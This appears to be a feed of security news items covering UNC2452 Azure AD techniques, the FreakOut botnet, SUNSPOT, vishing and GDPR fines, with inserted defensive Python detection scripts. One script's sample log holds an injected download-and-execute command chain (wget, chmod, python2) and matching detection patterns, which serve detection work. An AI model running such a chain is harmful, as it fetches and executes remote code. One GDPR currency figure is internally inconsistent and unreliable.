  1. Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  2. Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  3. Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  4. Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

Read the white paper for a detailed overview of each technique, including practical remediation and hardening strategies, and check out our auditing script, Azure AD Investigator.  

Detections

FireEye Helix Detection | MITRE Technique | Detection Logic
MICROSOFT AZURE ACTIVE DIRECTORY [Risky Sign-In] | T1078.004 | Alert on suspicious logon activity as detected by Azure Identity Protection
OFFICE 365 [Federated Domain Set] | T1550 | Alert on new domain federation in Office 365
OFFICE 365 [Modified Domain Federation Settings] | T1550 | Alert on modification to domain federation settings in Office 365
OFFICE 365 [User Added Credentials to Service Principal] | T1098.011 | Alert on addition of certificates or passwords to Service Principals
OFFICE 365 ANALYTICS [Abnormal Logon] | T1078.004 | Alert on suspicious login activity based on heuristics
WINDOWS METHODOLOGY [ADFS Dump] | TA0006, T1552, T1552.004, T1199 | Alert on access requests for the AD FS Distributed Key Manager (DKM) container in Active Directory
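One way to review an Office 365 unified audit log export for two of the techniques above (domain federation changes, T1550, and new service principal credentials, T1098.011), as an added example that is not Mandiant's Azure AD Investigator script. The record layout and sample records are constructed, and the Operation strings are assumed to match the Azure AD audit activity names as they appear in the unified audit log.

```python
"""Review an Office 365 unified audit log export for two UNC2452 techniques:
changes to domain federation (Azure AD backdoor, T1550) and new credentials on
a service principal (application backdoor, T1098.011).

Added illustration, not Mandiant's Azure AD Investigator. The record layout is
constructed, and the Operation strings are assumed to match the Azure AD audit
activity names exported to the unified audit log.
"""
import json
from collections import defaultdict

# Assumed audit activity names for the two techniques (see module docstring).
FEDERATION_OPS = {"Set federation settings on domain.", "Set domain authentication."}
SP_CREDENTIAL_OPS = {"Add service principal credentials."}

# Map each watched operation to the MITRE technique used in the detection table.
TECHNIQUE_BY_OP = {op: "T1550" for op in FEDERATION_OPS}
TECHNIQUE_BY_OP.update({op: "T1098.011" for op in SP_CREDENTIAL_OPS})

# Constructed sample export (JSON lines): two ordinary records, plus a federation
# change and a new service principal credential performed by the same actor.
SAMPLE_EXPORT = "\n".join(json.dumps(r) for r in [
    {"CreationTime": "2020-12-10T08:01:22", "Operation": "UserLoggedIn",
     "UserId": "alice@example.test", "ObjectId": "Exchange"},
    {"CreationTime": "2020-12-11T02:14:05", "Operation": "Set federation settings on domain.",
     "UserId": "svc-sync@example.test", "ObjectId": "example.test"},
    {"CreationTime": "2020-12-11T02:20:41", "Operation": "Add service principal credentials.",
     "UserId": "svc-sync@example.test", "ObjectId": "Mail Archiver App"},
    {"CreationTime": "2020-12-12T09:00:00", "Operation": "Update user.",
     "UserId": "helpdesk@example.test", "ObjectId": "bob@example.test"},
])


def parse_export(text):
    """Parse a JSON-lines export; malformed lines are skipped rather than fatal."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return records


def triage(records, approved_actors=()):
    """Return one finding per record whose Operation is a watched technique.

    approved_actors suppresses a known-good automation account: the white paper
    notes these operations are dual-use, so each hit is a review item, not proof.
    """
    findings = []
    for r in records:
        op = r.get("Operation", "")
        technique = TECHNIQUE_BY_OP.get(op)
        if technique is None or r.get("UserId") in approved_actors:
            continue
        findings.append({
            "time": r.get("CreationTime"),
            "technique": technique,
            "operation": op,
            "actor": r.get("UserId"),
            "target": r.get("ObjectId"),
        })
    return findings


def actors_to_escalate(findings):
    """Actors that both changed federation and added service principal credentials.

    Either action alone may be legitimate; the pair matches techniques 2 and 4
    from the list above and should be reviewed first.
    """
    seen = defaultdict(set)
    for f in findings:
        seen[f["actor"]].add(f["technique"])
    return sorted(a for a, t in seen.items() if {"T1550", "T1098.011"} <= t)


if __name__ == "__main__":
    found = triage(parse_export(SAMPLE_EXPORT))
    for f in found:
        print(f"{f['time']} {f['technique']} {f['actor']} -> {f['target']} ({f['operation']})")
    print("escalate:", actors_to_escalate(found))
```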

Privacy Fines: Total GDPR Sanctions Reach $331 Million

But Across Europe, Total Fines and Breach Reports Continue to Vary Widely by Country
Privacy watchdogs in Europe have imposed fines totaling more than $330 million since the EU's General Data Protection Regulation went into full effect in May 2018, according to law firm DLA Piper. Over the past year, regulators received 121,000 data breach notifications, up 19% from the year before.

FreakOut botnet targets 3 recent flaws to compromise Linux devices

Security researchers uncovered a series of attacks conducted by the FreakOut botnet that leveraged recently discovered vulnerabilities.

Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that is targeting multiple unpatched flaws in applications running on top of Linux systems.

The botnet appeared in the threat landscape in November 2020; in some cases the attacks leveraged recently disclosed vulnerabilities to inject OS commands. The attacks aimed at compromising the targeted systems to build an IRC botnet, which can later be used to conduct several malicious activities, including DDoS attacks and crypto-mining campaigns.

The attacks observed by Check Point aimed at devices that run one of the following products:

  • TerraMaster TOS (TerraMaster Operating System) – the operating system used for managing TerraMaster NAS (Network Attached Storage) servers
  • Zend Framework – a collection of packages used in building web applications and services using PHP, with more than 570 million installations
  • Liferay Portal – a free, open-source enterprise portal. It is a web application platform written in Java that offers features relevant for the development of portals and websites

Once a device is infected, it is later used as an attacking platform.

Botnet operators are scanning the internet for applications affected by one of the recently disclosed vulnerabilities in order to take over the underlying Linux system:

  • CVE-2020-28188 – RCE flaw that resides in the TerraMaster management panel (disclosed on December 24, 2020). This flaw could be exploited by a remote unauthenticated attacker to inject OS commands and gain control of servers running TerraMaster TOS (versions prior to 4.2.06).
  • CVE-2021-3007 – deserialization flaw that affects the Zend Framework (disclosed on January 3, 2021). The flaw affects Zend Framework versions higher than 3.0.0; the attacker can abuse the Zend3 feature that loads classes from objects to upload and execute malicious code on the server. The code can be uploaded using the “callback” parameter, which in this case inserts malicious code instead of the “callbackOptions” array.
  • CVE-2020-7961 – Java unmarshalling flaw via JSONWS in Liferay Portal (versions prior to 7.2.1 CE GA2) (disclosed on March 20, 2020). An attacker can exploit the flaw to provide a malicious object that, when unmarshalled, allows remote code execution.

“In all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to download and execute a Python script named “out.py”.” reads the analysis published by Check Point. “After the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2. Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”

The bot is an obfuscated Python script downloaded from the site https://gxbrowser[.]net consisting of polymorphic code.
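The download-and-execute sequence quoted above (fetch out.py, chmod it, run it with Python 2) can be hunted for in web server access logs. The following is an added example, not Check Point's code: the log lines are constructed in Combined Log Format, and the indicator list is an assumption drawn from the article's description rather than a published signature.

```python
"""Flag web requests carrying the download-and-execute pattern Check Point
attributes to FreakOut's first move (fetch out.py, chmod it, run it with python2).

Added illustration, not Check Point's code. The access log lines are constructed
in Combined Log Format; the indicator list is an assumption drawn from the text.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Combined Log Format prefix: client, identity, user, [time], "request", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicators applied to the URL-decoded request path and query (assumed list).
INDICATORS = {
    "script_name": re.compile(r"out\.py"),
    "download": re.compile(r"\b(wget|curl)\b"),
    "chmod": re.compile(r"\bchmod\b"),
    "python2": re.compile(r"\bpython2\b"),
}

# Constructed sample: one injected command chain, one legitimate page about python2.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jan/2021:10:12:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [15/Jan/2021:10:12:09 +0000] "GET /module/api.php?cmd=wget%20http%3A%2F%2Fexample.invalid%2Fout.py%3Bchmod%20%2Bx%20out.py%3Bpython2%20out.py HTTP/1.1" 200 35 "-" "python-requests/2.25"
203.0.113.9 - - [15/Jan/2021:10:12:10 +0000] "POST /api/jsonws/ HTTP/1.1" 500 0 "-" "python-requests/2.25"
198.51.100.4 - - [15/Jan/2021:10:13:00 +0000] "GET /docs/python2-migration.html HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""


def indicators_in(path):
    """Names of indicators present in the decoded path.

    Decoding first matters: the injected commands arrive percent-encoded, so
    matching on the raw path would miss them.
    """
    decoded = unquote_plus(path)
    return {name for name, rx in INDICATORS.items() if rx.search(decoded)}


def flag_requests(log_text, min_indicators=2):
    """Return findings for requests matching at least min_indicators indicators.

    Requiring two or more avoids flagging ordinary content that merely mentions
    python2 or a script name; the real chain matches several at once.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access log line
        hits = indicators_in(m.group("path"))
        if len(hits) >= min_indicators:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "indicators": hits,
                "decoded_path": unquote_plus(m.group("path")),
            })
    return findings


def attempts_by_source(findings):
    """Count flagged requests per client: the article notes the attacker tries
    several command syntaxes, so a source with repeated hits stands out."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = flag_requests(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], sorted(f["indicators"]))
        print("   ", f["decoded_path"])
    print(attempts_by_source(found))
```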

The FreakOut botnet has a modular structure; it uses a specific function for each capability it supports. Below is a list of the functions implemented in the botnet:

  • Port Scanning utility
  • Collecting system fingerprint
    • Includes the device address (MAC, IP), and memory information. These are used in different functions of the code for different checks
    • TerraMaster TOS version of the system
  • Creating and sending packets
    • ARP poisoning for Man-in-the-Middle attacks.
    • Supports UDP and TCP packets, but also application layer protocols such as HTTP, DNS, SSDP, and SNMP
    • Protocol packing support created by the attacker.
  • Brute Force – using hard coded credentials 
    • With this list, the malware tries connecting to other network devices using Telnet. The function receives an IP range and tries to brute force each IP with the given credential. If it succeeds, the results of the correct credential are saved to a file, and sent in a message to the C2 server
  • Handling sockets
    • Includes handling exceptions of runtime errors.
    • Supports multi-threaded communication to other devices. This allows simultaneous actions the bots can perform while listening to the server
  • Sniffing the network
    • Executes using the “ARP poisoning” capability. The bot sets itself as a Man-in-the-Middle to other devices. The intercepted data is sent to the C2 server
  • Spreading to different devices, using the “exploit” function.
    • Randomly generates the IPs to attack
    • Exploits the CVEs mentioned above (CVE-2020-7961 , CVE-2020-28188, CVE-2021-3007)
  • Gaining persistence by adding itself to the rc.local configuration.
  • DDOS and Flooding – HTTP, DNS, SYN
    • Self-implementation of Slowloris. The malware creates many sockets to a relevant victim address for the purpose of instigating a DDoS attack
  • Opening a reverse-shell – shell on the client
  • Killing a process by name or ID
  • Packing and unpacking the code using obfuscation techniques to provide random names to the different functions and variables.

The botnet could conduct multiple malicious activities by combining the above functions, such as delivering cryptocurrency miners, launching DDoS attacks, or spreading laterally across the company network.

Check Point researchers analyzed the malicious code and were able to access the IRC channel used by the botmaster to control the botnet.

The botnet is in an early stage: at the time of the analysis, the IRC panel showed it was controlling only 188 bots.

Check Point experts were also able to track its author, who goes online with the moniker Freak.

“To identify the threat actors responsible for the attacks, we searched for leads in the internet and social media.  Searching for both the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels) and the IRC bot name “N3Cr0m0rPh”, revealed information about the threat actor behind the campaign.” continues the analysis.

“In a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic IRC BOT”, the bot is offered for sale in exchange for BitCoins (BTC).”

The analysis published by the experts includes the MITRE ATT&CK TECHNIQUES and protections (IoCs, IPS, and Anti-Bot).

Pierluigi Paganini

(SecurityAffairs – hacking, FreakOut botnet)

The post FreakOut botnet target 3 recent flaws to compromise Linux devices appeared first on Security Affairs.

Never buy an iPad in January

If you're in the market for an iPad Pro, now is not the time to buy. We expect new iPad Pros to be introduced in March, and we have the pretty charts to back up that assertion.

World Economic Forum: Action Required to Address Digital Inequalities Post-COVID

“A world leader once said ‘a decade can go by without any real news and then you can feel a decade happening in a week.’ I feel that a decade has happened in the past year,” commented Børge Bende, president of the World Economic Forum (WEF), speaking during a press conference highlighting the findings from the organization’s 16th Global Risks Report 2021.

This has arisen from the ongoing COVID-19 pandemic, which has brought about substantial changes to the political, economic and social landscape. During the webinar, the panellists emphasized the growing importance of technology, both in helping governments and businesses function amid the ongoing crisis, and for the rebuilding of the world’s economy going forward.

Peter Giger, group chief risk officer, Zurich Insurance Group, explained that COVID-19 had accelerated the so-called ‘fourth industrial revolution’ by rapidly expanding areas such as e-commerce, online education, digital healthcare and remote working. “These shifts will continue to transform human interactions and livelihoods long after COVID is behind us,” he outlined.

This move towards a “digital economy” offers great opportunities but also poses the risk of more global inequality by the creation of an “underclass” of people who are excluded from work as a result of a lack of internet and educational access. For instance, the report noted that internet usage ranges from 87% of the population in high-income countries to under 17% in low-income countries. Widening inequality gaps is particularly dangerous at this time of substantial polarization and the biggest peacetime economic slump in history, as it will threaten global stability, according to Bende.

It is for this reason that the report listed digital inequality as one of the main risks over the coming years, and argued that economic growth needs to be more inclusive and sustainable. It is therefore critical that efforts are made to improve access to the internet and the development of digital skills. Bende added: “We have to invest in global access to the internet and we have to invest in schools, upskilling, reskilling, making sure that inequalities are not growing but are declining.”

As well as the potential sowing of more division through digital inequality, the panel highlighted other dangers that a rapid shift to technology brings. One of these is cybersecurity failures, which the WEF report highlighted as a big worry over the next two years. Carolina Klint, risk management leader for continental Europe at Marsh, noted that the almost overnight shift to home working many businesses were forced to undertake last year has “exponentially increased cyber-exposures and created more complex and potentially less secure networks.” Klint added: “Businesses should now really take the time to assess changes that were made in the heat of the pandemic and verify that the right investments have been made in networks and controls.”

Another major issue emanating from greater internet usage is the rise in misinformation, which has been particularly demonstrated by the fear-mongering and conspiracy theories linked to the COVID-19 crisis. In the view of Giger, this is causing more disconnect and polarization, as well as threatening democracy. However, governments must be cautious when taking regulatory action over this, and on protecting people from big tech monopolies, as this could lead to information censorship and more restricted internet access, risking “our hard won personal freedoms.”

Ultimately, the panel stated that the pandemic has provided an important lesson to countries in dealing with unexpected events. Guillaume Barthe-Dejean, director, chairman’s office at SK Group, noted that those countries “that digitized early tended to perform better” both from a health and economic point of view. These were nations such as Japan, Korea and China, which have effective track and trace systems, more effective communications, a greater continuity of public services and minimized labor disruptions. Barthe-Dejean added: “That’s a real learning point from hyper-connected economies such as South Korea, which has the highest internet penetration, at 96.2% of its population.”

Dnsmasq vulnerabilities open networking devices, Linux distros to DNS cache poisoning

Seven vulnerabilities affecting Dnsmasq, a caching DNS and DHCP server used in a variety of networking devices and Linux distributions, could be leveraged to mount DNS cache poisoning attack and/or to compromise vulnerable devices. “Some of the bigger users of Dnsmasq are Android/Google, Comcast, Cisco, Red Hat, Netgear, and Ubiquiti, but there are many more. All major Linux distributions offer Dnsmasq as a package, but some use it more than others, e.g., in OpenWRT it … More

The post Dnsmasq vulnerabilities open networking devices, Linux distros to DNS cache poisoning appeared first on Help Net Security.

A Set of Severe Flaws Affect Popular DNSMasq DNS Forwarder

Cybersecurity researchers have uncovered multiple vulnerabilities in Dnsmasq, a popular open-source software used for caching Domain Name System (DNS) responses, thereby potentially allowing an adversary to mount DNS cache poisoning attacks and remotely execute malicious code. The seven flaws, collectively called "DNSpooq" by Israeli research firm JSOF, echo previously disclosed weaknesses in

Vishing attacks conducted to steal corporate accounts, FBI warns

The Federal Bureau of Investigation (FBI) has issued a notification warning of ongoing vishing attacks attempting to steal corporate accounts.

The Federal Bureau of Investigation (FBI) published a Private Industry Notification (PIN) that warns of ongoing vishing attacks aimed at stealing corporate accounts and credentials from US and international-based employees.

Vishing (also known as voice phishing) is a social engineering attack technique where attackers impersonate a trusted entity during a voice call in an attempt to trick victims into providing sensitive information.

The alert highlights that during the COVID-19 pandemic, organizations are more exposed to these attacks because they quickly changed their working processes to maintain social distancing. As a result, network access and privilege escalation may not be fully monitored.

The threat actors are using Voice over Internet Protocol (VoIP) platforms to obtain employees’ credentials.

“Cyber criminals are trying to obtain all employees’ credentials, not just individuals who would likely have more access based on their corporate position.” reads the FBI alert. “The cyber criminals vished these employees through the use of VoIP platforms.”

Once they have gained access to the network, the crooks expand that access, for example by escalating the privileges of the compromised employees’ accounts.

The alert reports the case of an attack in which cyber criminals found an employee via the company’s chatroom and tricked him into logging into a fake VPN page. The attackers then used these credentials to log into the company’s VPN and performed reconnaissance to find employees with higher privileges who could perform username and e-mail changes; they found such an employee through a cloud-based payroll service and used a chatroom messaging service to conduct a phishing attack against this employee.

Below are the mitigations recommended by the FBI:

  • Implement multi-factor authentication (MFA) for accessing employees’ accounts in order to minimize the chances of an initial compromise.
  • When new employees are hired, network access should be granted on a least privilege scale. Periodic review of this network access for all employees can significantly reduce the risk of compromise of vulnerable and/or weak spots within the network.
  • Actively scanning and monitoring for unauthorized access or modifications can help detect a possible compromise in order to prevent or minimize the loss of data.
  • Network segmentation should be implemented to break up one large network into multiple smaller networks which allows administrators to control the flow of network traffic.
  • Administrators should be issued two accounts: one account with admin privileges to make system changes and the other account used for email, deploying updates, and generating reports.

In August, the FBI and CISA issued a joint alert to warn teleworkers of an ongoing vishing campaign targeting entities from multiple US sectors.

This is the second warning alerting of active vishing attacks targeting employees issued by the FBI since the start of the pandemic after an increasing number of them have become teleworkers.

In August 2020, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory warning remote workers of an ongoing vishing campaign targeting companies from several US industry sectors.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, vishing)

The post Vishing attacks conducted to steal corporate accounts, FBI warns appeared first on Security Affairs.

Injecting a Backdoor into SolarWinds Orion

Crowdstrike is reporting on a sophisticated piece of malware that was able to inject malware into the SolarWinds build process:

Key Points

  • SUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.
  • SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code.
  • Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary’s presence.

Analysis of a SolarWinds software build server provided insights into how the process was hijacked by StellarParticle in order to insert SUNBURST into the update packages. The design of SUNSPOT suggests StellarParticle developers invested a lot of effort to ensure the code was properly inserted and remained undetected, and prioritized operational security to avoid revealing their presence in the build environment to SolarWinds developers.

This, of course, reminds many of us of Ken Thompson’s thought experiment from his 1984 Turing Award lecture, “Reflections on Trusting Trust.” In that talk, he suggested that a malicious C compiler might add a backdoor into programs it compiles.

The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well-installed microcode bug will be almost impossible to detect.

That’s all still true today.
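One defensive counterpart to the substitution described in the SUNSPOT key points above, as an added example (not code from the original post or from CrowdStrike's report): fingerprint the source tree immediately before and after a build and compare both snapshots with the reviewed manifest, so a file the compiler consumed but reviewers never saw shows up as drift. The `build` callable, the file names and the file contents are constructed for the demonstration.

```python
"""Build-integrity check against in-build source substitution (added example)."""
import hashlib
import tempfile
from pathlib import Path

# Source extensions worth fingerprinting; constructed for this example.
SOURCE_SUFFIXES = {".cs", ".c", ".cpp", ".h"}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> dict:
    """Map each source file (path relative to root) to its SHA-256 digest."""
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix in SOURCE_SUFFIXES:
            manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def diff_manifests(expected: dict, observed: dict) -> dict:
    """Return the files whose digests changed, appeared or disappeared."""
    return {
        "modified": sorted(k for k in expected
                           if k in observed and expected[k] != observed[k]),
        "added": sorted(k for k in observed if k not in expected),
        "removed": sorted(k for k in expected if k not in observed),
    }


def guarded_build(root: Path, reviewed: dict, build) -> dict:
    """Run `build(root)` between two snapshots and report any drift.

    `build` is a hypothetical callable standing in for the real compiler
    invocation. Drift between the reviewed manifest, the pre-build snapshot
    and the post-build snapshot means the compiler may have read a file
    that differs from what code review approved.
    """
    before = snapshot(root)
    build(root)
    after = snapshot(root)
    return {
        "pre_build_vs_reviewed": diff_manifests(reviewed, before),
        "during_build": diff_manifests(before, after),
    }


def tampered(report: dict) -> bool:
    """True if any comparison in the report found a changed file."""
    return any(files for comparison in report.values()
               for files in comparison.values())


def demo() -> dict:
    """Simulate a clean build and a build in which one source is swapped."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "src").mkdir()
        (root / "src" / "Widget.cs").write_text("class Widget {}\n")
        (root / "src" / "Util.cs").write_text("class Util {}\n")
        reviewed = snapshot(root)  # what code review signed off on

        def clean_build(r):  # compiler touches nothing
            pass

        def tampering_build(r):  # models a source file replaced mid-build
            (r / "src" / "Widget.cs").write_text(
                "class Widget { /* unreviewed code inserted at build time */ }\n")

        return {
            "clean": guarded_build(root, reviewed, clean_build),
            "tampered": guarded_build(root, reviewed, tampering_build),
        }
```

A substitution that is reverted before the post-build snapshot is invisible to this comparison, so in practice it belongs alongside verification of the compiler's actual inputs or a reproducible-build check of the artifact.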

Cloud Config Error Exposes X-Rated College Pics

A cloud misconfiguration at a now-defunct social media app has exposed hundreds of thousands of files, including explicit photos of users that they thought had been deleted, according to vpnMentor.

A research team led by Noam Rotem discovered the AWS S3 bucket on October 13 last year, tracing it back to Fleek and owner Squid Inc.

The app apparently marketed itself as an uncensored alternative to Snapchat “Campus Stories.” A hit with US college students, it promised to automatically delete photos after a short period, encouraging users to post salacious pics of themselves engaged in sexually explicit and illegal activities.

However, as the researchers found, many photos were not deleted at all — in fact, they were still being stored long after the app was closed down in 2019.

“Many of these were shared in folders given offensive and derogatory names like ‘asianAss’ by the app’s developers,” vpnMentor explained.

“Fleek users were mostly college students naive of the implications of uploading images that show them engaging in embarrassing and criminal activities, such as drug use. If cyber-criminals obtained these images and knew how to find the people exposed, they could easily target them and blackmail them for large sums of money.”

In total, the research team found around 377,000 files in the 32GB bucket. This also included photos and bot scripts which it’s believed relate to a paid chat room service the app’s owners were trying to promote to users.

To encourage male users, the app’s owners appear to have created numerous bot accounts using images of women scraped from the internet. To ‘chat’ to these bots, users would have to pay a fee.

Having contacted both Squid Inc’s founder and AWS to notify them about the privacy snafu, vpnMentor found the bucket had been secured about a week after it was discovered. However, it’s unclear whether the data has been deleted or not.

“Never share anything you’d be embarrassed about online — few systems are 100% secure from hacking, leaks, or dishonest people saving incriminating images to hurt you in the future,” warned vpnMentor.

“It's also important to know what happens to your data after a company that has collected it goes bankrupt or shuts down. Often, with smaller companies, the owner maintains possession of the data, and there’s very little accountability stopping them from misusing it or sharing with others in the future.”

Choosing an MSP: Cymax Group case study

This is the last in a series of three articles sponsored by Ricoh looking at how different companies facing transformation evaluate their MSP options. The variety of services MSPs provide can range from the monitoring IT networks to being responsible for all repairs, updates and patches, as well as providing new software, hardware, infrastructure, cloud…

The post Choosing an MSP: Cymax Group case study first appeared on IT World Canada.

Most Financial Services Have Suffered COVID-Linked Cyber-Attacks

Financial services firms were hit hard over the past year, with 70% experiencing a successful cyber-attack and most of these blaming COVID-related conditions for the incident, according to Keeper Security.

The password security firm commissioned the Ponemon Institute to poll over 370 UK IT security leaders in the sector, as part of a larger global study.

It revealed that the rapid shift to remote working forced on businesses during the pandemic provided threat actors with an opportunity to target remote workers.

Over half (57%) of respondents argued that cyber-attacks are increasing in severity as a result of work-from-home (WFH) and 41% argued that remote workers are putting the business at risk of a major data breach.

Respondents were most concerned about a lack of physical security wherever their employees are remote working from (48%) and their devices becoming infected with malware (34%). This matters in the UK especially as it boasts more privileged users than any other country: 31% of remote workers have access to critical, sensitive and proprietary information.

Trend Micro research last year revealed that home workers often engage in more risky behavior than when they’re at the office. When combined with the surge in COVID-19 phishing emails and devices that may be shared with other users in the same household and/or less well protected than corporate equivalents, it adds up to a potential perfect storm of risk.

Insufficient budget and lack of know-how on combatting cyber-attacks were flagged by respondents as the biggest IT security challenges with remote working.

They were most concerned about the threat to customer records (50%) and financial information (48%). IT security managers are right to be worried, given the potential regulatory and reputational impact of a breach.

According to Keeper Security CEO, Darren Guccione, things are particularly precarious given the double whammy of the pandemic and Brexit, which saw UK banks lose their crucial “passporting” rights.

“The adjustments to life as we know it due to COVID-19, and the limitations set to be imposed by Brexit, have seen businesses struggle to adopt essential operational requirements to stay afloat,” he argued.

“Without rigorous security in place, financial institutions across the UK jeopardise their future. It only takes one cyber-attack to destroy the reputation of the entire business.”

New Educational Video Series for CISOs with Small Security Teams

Cybersecurity is hard. For a CISO that faces the cyber threat landscape with a small security team, the challenge is compounded. Compared to CISOs at large enterprises, CISOs at small to medium-sized enterprises (SMEs) have smaller teams with less expertise, smaller budgets for technology and outside services, and are more involved in day-to-day protection activities. CISOs at SMEs are

FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities

An ongoing malware campaign has been found exploiting recently disclosed vulnerabilities in network-attached storage (NAS) devices running on Linux systems to co-opt the machines into an IRC botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency. The attacks deploy a new malware variant called "FreakOut" by leveraging critical flaws fixed in Laminas

Hashtag Trending – DuckDuckGo hits milestone; Snapchat handing out cash; Tech withdrawal

DuckDuckGo reaches a milestone of 100 million daily search queries, Snapchat is giving out big bucks, and experts predict that kids will face a tech withdrawal once life returns to “normal.”

The post Hashtag Trending – DuckDuckGo hits milestone; Snapchat handing out cash; Tech withdrawal first appeared on IT World Canada.

GDPR Fines Surge 39% Over Past Year Despite #COVID19

The past year has seen double-digit increases in the value of GDPR fines imposed by regulators and the volume of breaches notified to regulators, according to a new analysis by DLA Piper.

The international law firm said that €158.5m ($192m, £141m) in fines was imposed since January 28, 2020, a 39% increase on the previous 20-month period since the law came into force in May 2018.

Breach notifications surged by 19%, the second consecutive double-digit increase, to reach 121,165 over the past year.

In total, €272.5m ($332m, £45m) in fines has been issued since the start of the new regulatory regime, with Italy (€69m) having imposed the largest amount, followed by Germany and France.

Total breach notification volumes have reached 281,000, with Germany (77,747), the Netherlands (66,527) and the UK (30,536) topping the table. However, when weighted according to national populations, Denmark comes top, followed by the Netherlands and Ireland.

Although the upward trajectory of fines and notifications would suggest that the GDPR is forcing organizations to be more transparent about incidents and providing regulators with a powerful statutory instrument to punish major transgressors, the truth is more nuanced.

In the UK, for example, the Information Commissioner’s Office (ICO), a leading regulator in the drafting of the legislation, significantly reduced fines planned for BA and Marriott International, from a combined £282m to just £38m last year. It is believed the COVID-19 pandemic may have been a factor.

Concerns were raised last year that national regulators are simply not resourced sufficiently to launch major investigations against the world’s biggest companies, especially tech giants with deep pockets.

However, the coming year is likely to see a ramping up of regulatory pressure, warned Ross McKean, chair of DLA Piper’s UK Data Protection and Security Group.

“Regulators have adopted some extremely strict interpretations of GDPR, setting the scene for heated legal battles in the years ahead. However, we have also seen regulators show a degree of leniency this year in response to the ongoing pandemic with several high-profile fines being reduced due to financial hardship,” he explained.

“During the coming year we anticipate the first enforcement actions relating to GDPR’s restrictions on transfers of personal data to the US and other ‘third countries’ as the aftershocks from the ruling by Europe’s highest court in the Schrems II case continue to be felt."

Is Signal Secure? An Analysis of its History, Encryption Protocol, and Privacy Policy

Everyone from Elon Musk to Edward Snowden has been talking about Signal these days. Friends, family, and followers received recommendations to create accounts left and right, leaving us to wonder: what is Signal? And even more importantly, is Signal secure? Before diving into the technical details, I’ll have a brief look at the app’s history […]

The post Is Signal Secure? An Analysis of its History, Encryption Protocol, and Privacy Policy appeared first on Heimdal Security Blog.

Machine Learning in Cybersecurity: The New Essential for Enhanced Performance

Machine learning is usually mentioned in contexts that actually refer to artificial intelligence or used as a synonym. Let us have a closer look at what the terms artificial intelligence, machine learning and deep learning (another common notion used in relation to AI) really mean. We will also discuss how we can use machine learning […]

The post Machine Learning in Cybersecurity: The New Essential for Enhanced Performance appeared first on Heimdal Security Blog.

Deploying AI-powered cybersecurity directly on drones

SparkCognition and SkyGrid announced a new collaboration to deploy AI-powered cybersecurity directly on drones, protecting them from zero-day attacks during flight. Equipped with SparkCognition’s DeepArmor cybersecurity product, SkyGrid is the first airspace management system to enable drone protection powered by AI. This approach provides more advanced airspace security than traditional anti-malware reliant on signatures of known threats. “In the near future, we’ll essentially have a network of flying computers in the sky, and just like … More

The post Deploying AI-powered cybersecurity directly on drones appeared first on Help Net Security.

Rethinking Active Directory security

In the wake of a cyberattack, Active Directory is sometimes dismissed as just another service that needs to be recovered, and security is an afterthought. But the hard reality is that if Active Directory is compromised, so is your entire environment. 90% of organizations use Active Directory as their primary store for employee authentication, identity management, and access control. Today, it’s becoming more common for organizations to take a hybrid approach to identity and focus … More

The post Rethinking Active Directory security appeared first on Help Net Security.

Are you vetting your MSSPs?

